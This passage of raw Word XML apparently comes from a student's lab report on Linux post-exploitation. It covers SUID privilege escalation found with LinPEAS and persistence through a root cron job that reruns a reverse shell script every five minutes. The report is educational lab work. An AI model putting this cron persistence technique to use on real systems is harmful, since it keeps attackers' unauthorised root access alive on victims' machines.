        <w:t>Cron Job Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9EB8EA" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>*/5 * * * * root /root/.persist.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628ABEC" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61583813" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6014F">
        <w:t>Reverse shell re-established after reboot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C2BB7" w14:textId="3D681C0A" w:rsidR="00A6014F" w:rsidRDefault="00CF3A79" w:rsidP="00A6014F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6356FCE1" wp14:editId="23276332">
            <wp:extent cx="4633362" cy="2827265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8082682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68296" name="Picture 8082682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299F" w14:textId="5417C4F9" w:rsidR="00D62D14" w:rsidRPr="00A6014F" w:rsidRDefault="00D62D14" w:rsidP="00A6014F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EEC59F4" wp14:editId="73D04752">
            <wp:extent cx="1066892" cy="281964"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="17474177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17710" name="Picture 17474177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B3CB" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="4AC3A59E">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F41F2" w14:textId="3CAA7B1B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 xml:space="preserve">9. Persistence Summary </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E71BA86" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t>Persistence was established by creating a root-level cron job that executes a reverse shell script every five minutes. This ensures continued access after reboot or session termination. Cron-based persistence is reliable, stealthy, and commonly abused by attackers once administrative privileges are obtained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0DB02C" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="4EB56F52">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="642C6DCF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10. Checklist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D98B6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>Run LinPEAS for enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485830EB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>Identify SUID binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A59870D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>Exploit SUID privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579EFC33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>Confirm root access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093E21BF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>Create persistence script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA16179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>Configure cron job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D252490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>Verify persistence after reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F89EB2" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="217C7D39">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ED1292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11. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EE20EA" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F">
      <w:r w:rsidRPr="00A6014F">
        <w:t xml:space="preserve">This lab demonstrated a complete attack lifecycle including enumeration, privilege escalation, and persistence on a vulnerable Linux system. By exploiting SUID </w:t>
      </w:r>
      <w:r w:rsidRPr="00A6014F">
        <w:lastRenderedPageBreak/>
        <w:t>misconfigurations identified through LinPEAS, root access was achieved and maintained using a cron-based persistence mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679B3E84" w14:textId="39E1878A" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00000000" w:rsidP="00A6014F">
      <w:r>
        <w:pict w14:anchorId="3FDCC4C8">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F90399B" w14:textId="77777777" w:rsidR="00A6014F" w:rsidRPr="00A6014F" w:rsidRDefault="00A6014F" w:rsidP="00A6014F"/>
    <w:sectPr w:rsidR="00A6014F" w:rsidRPr="00A60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03A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2BA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F1AD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EF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E3041"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F19A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96195"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C0C6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C682E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FB9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233BD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="356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27453"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3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04CD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F16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A3A7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3726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41EEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD3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F1442"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE7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661957">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1303540382">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1533807028">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1320380098">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1990208653">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1387147413">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1989312229">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1333340148">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1646397943">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="702904986">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="19010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4F"/>
    <w:rsid w:val="0028789F"/>
    <w:rsid w:val="007E7EFE"/>
    <w:rsid w:val="00A6014F"/>
    <w:rsid w:val="00CE425F"/>
    <w:rsid w:val="00CF3A79"/>
    <w:rsid w:val="00D6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C9D1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BF7BC745-50DB-4170-99C9-2A2B6B49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Prakanth Vijayakumar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prakanth Vijayakumar</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-20T15:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-22T12:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>